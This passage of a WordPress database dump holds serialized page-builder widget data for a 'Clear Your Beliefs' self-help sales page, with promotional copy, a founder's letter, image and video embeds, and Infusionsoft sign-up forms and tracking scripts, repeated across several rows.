magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: -10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2740:"<div id="divStroke">\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />ANote from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1134, 1618, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1517:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -14px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: -10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2739:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1135, 1619, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1517:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -14px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: -10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2739:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1380, 1809, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:88:"[su_posts template="templates/single-post.php" post_type="attachment" post_status="any"]";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script 